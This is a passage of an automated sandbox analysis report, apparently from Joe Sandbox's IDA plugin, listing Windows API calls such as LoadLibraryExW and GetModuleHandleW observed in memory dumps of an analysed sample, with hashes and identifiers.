                                                                                                                                • Snapshot File: hcaresult_4_2_6980000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HookWindows
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2559412058-0
                                                                                                                                • Opcode ID: 14b3549c155f1eb841fdb848af257d07cc9c8db9be3a870c960eefed2f82d100
                                                                                                                                • Instruction ID: 28e65cd6aad440aaa82927520e59b0d1eb70991c7667e2e0197c7857189084f2
                                                                                                                                • Opcode Fuzzy Hash: 14b3549c155f1eb841fdb848af257d07cc9c8db9be3a870c960eefed2f82d100
• Instruction Fuzzy Hash: 55212775D002099FCB50DF9AD844BEEFBF5EB88320F10841AD419A7650CB78A944CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,0698D9E9,00000800), ref: 0698DA7A
Memory Dump Source
• Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6980000_file.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 83338efb555ffb4740ac2833287a545ebc6dbcdea4a9925a620dbcf661531446
• Instruction ID: 18be0909581ef22cd1999866ae7c32fbd7db05dff65da6a89e2a100ae5847cf7
• Opcode Fuzzy Hash: 83338efb555ffb4740ac2833287a545ebc6dbcdea4a9925a620dbcf661531446
• Instruction Fuzzy Hash: C12124B6C002499FCB10DF9AC844ADEBBF8AF48324F24841AE469A7640C375A545CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,0698D9E9,00000800), ref: 0698DA7A
Memory Dump Source
• Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6980000_file.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 1767a274dc2df83627db77710706b7e551e66be9e37f3888087d388a3628e37f
• Instruction ID: f34aead24f79595dbb1176e9b1d857a3078754af6609d87530c89e5f6c910f19
• Opcode Fuzzy Hash: 1767a274dc2df83627db77710706b7e551e66be9e37f3888087d388a3628e37f
• Instruction Fuzzy Hash: 261106B6D043499FCB10DF9AC484ADEBBF8EF48320F20841AD45AA7640C375A545CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 06C41906
Memory Dump Source
• Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6c40000_file.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: ba114e315513c3f27b82a26ce93306ad8cb027c1a8e480abdba4c76f1cacc6c9
• Instruction ID: 1cd1f208372787588c94fa9206eff8d289bbaa2cc9acbc6df6642ba05282b088
• Opcode Fuzzy Hash: ba114e315513c3f27b82a26ce93306ad8cb027c1a8e480abdba4c76f1cacc6c9
• Instruction Fuzzy Hash: 1E1113B5C002498FCB10DF9AC444ADEFBF4EF48324F14841AD459B7600D379A585CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06C4BFA5), ref: 06C4C02F
Memory Dump Source
• Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6c40000_file.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 94e04d0e5f3eaa21aa49d24ecd223a03cd9c5963a9ab20b9d7827045cd1e5a33
• Instruction ID: 446570e9ea05b5b0c3b650f00e9bc8aa303988442ddb1f6b9dad46cca799fe71
• Opcode Fuzzy Hash: 94e04d0e5f3eaa21aa49d24ecd223a03cd9c5963a9ab20b9d7827045cd1e5a33
• Instruction Fuzzy Hash: E6F044B59002488FCB20DF89D4887DEBBF0AF88324F20841AD128A3660C379A484CFA0
Uniqueness
Uniqueness Score: -1.00%